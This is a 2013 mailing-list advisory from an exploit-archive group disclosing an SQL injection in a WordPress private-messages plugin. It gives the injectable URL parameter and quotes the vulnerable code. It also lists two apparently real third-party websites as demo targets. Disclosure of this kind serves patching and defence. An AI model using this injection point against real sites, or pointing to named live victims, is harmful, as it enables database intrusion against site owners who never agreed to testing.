[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <201306291502.r5TF2b2t006435@sf01web1.securityfocus.com>
Date: Sat, 29 Jun 2013 15:02:37 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Wordpress wp-private-messages Plugin Sql Injection vulnerability
The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability.
#################################
# Iranian Exploit DataBase
# Www.exploit.IrIsT.Ir
#################################
# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Home : http://exploit.IrIsT.Ir
# Software Link : http://wordpress.org/plugins/wp-private-messages/
# Security Risk : High
# Tested on : Linux
#################################
# Exploit :
# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# Dem0 :
# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
#################################
# Vuln Source C0de :
# Lin 145 :
# $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");
# And Lin 160 :
# echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";
#################################
# Exploit Archive : http://exploit.irist.ir/exploits-148.html
#################################
Powered by blists - more mailing lists